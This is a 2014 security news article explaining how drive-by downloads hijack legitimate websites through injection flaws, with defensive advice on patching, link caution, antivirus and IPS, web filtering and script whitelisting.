Defending against drive-by downloads
by Corey Nachreiner - Director of Security Strategy at WatchGuard - Monday, 3 February 2014.
The attackers search for web application vulnerabilities in popular and legitimate web sites, such as SQL injection (SQLi) and cross-site scripting (XSS) flaws, then exploit these problems to inject malicious code into the legitimate site, redirecting anyone who visits the site to malicious DbD code.

In the past, I could warn you against visiting sordid web sites to avoid DbD attacks. However, today any site on the Internet—even the ones you trust the most—may have been hijacked and could be hiding a drive-by download.

Part of being a good spy is understanding your adversary’s techniques, and then learning the tradecraft that can protect you in the field. Now that you know what a drive-by download is, and how they work, here’s a few cyber tradecraft tips that will protect you online:

Patch, patch, and then patch some more – In “computer-ese,” patching means to apply the latest updates to your computer software. As mentioned, web sites can’t forcefully download software to your computer unless they can take advantages of programming flaws in the software you run. Many of the DbD attacks seen in the wild exploit flaws that vendors have already fixed. If you keep your software up to date, most of attacks will fail. Obviously patch you web browser, but also know hackers are focusing on exploiting Java and Flash vulnerabilities lately. You should patch these packages just as aggressively as the browser itself. In fact, I would recommend disabling Java if you can.

Don’t click unsolicited links – Simply put, avoid clicking unsolicited links sent to you via email and IM. I probably can’t convince you not to click on links from your friends (or ones that seem like they come from your friends), but at least remain wary of them, and look at the URL for the link before clicking it. I would also be careful around shortened links, and leverage tools to expand and preview these links before following them. Here’s a quick tip; if you add a “+” character to the end of a bit.ly link, you will see a preview of the actual URL before visiting it.

Use antivirus (AV) and intrusion prevention (IPS) – While vigilance and good practices can help you avoid many attacks, no one is perfect. There will be a day that even the best of us stumble on DbD attack sites. IPS systems can frequently detect the network exploits these attacks leverage, and AV systems can often recognize the malicious payloads they try to silently download. Use AV and IPS systems, and keep them up to date.

Use reputation-based web-filtering solutions – The malicious sites that serve DbD attacks change quite frequently, as do the legitimate sites that have been hijacked. Security organizations and vendors, like WatchGuard, use many automated techniques to keep track of the latest malware distributing sites, and offer reputation services that can keep you and your users away from them. You should consider using web-filtering solutions to help you avoid dangerous sites on the Internet.

Pro-tip: Limit web-based scripting with NoScript (and others) – Without going into all the technical details, know that many DbD attacks rely on web scripting languages, such as JavaScript and ActiveX, to carry out their attacks. Disabling these scripting technologies would block a huge majority of DbD attacks. Unfortunately, it’s not quite that simple. Many legitimate web sites also use these scripting languages for perfectly normal aspects of their web site. That’s why I recommend script whitelisting technologies like Firefox’s NoScript or Chrome’s NotScripts or Click-to-Play. These plugins will prevent scripts and some dynamic web content from running by default, but also allow you to easily whitelist sites you trust.

Spotlight

Patching: The least understood line of defense

Posted on 29 August 2014.  |  How many end users, indeed how many IT pros, truly get patching? Sure, many of us see Windows install updates when we shut down our PC and think all is well. It’s not.


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  

DON'T
MISS

Tue, Sep 2nd
    COPYRIGHT 1998-2014 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //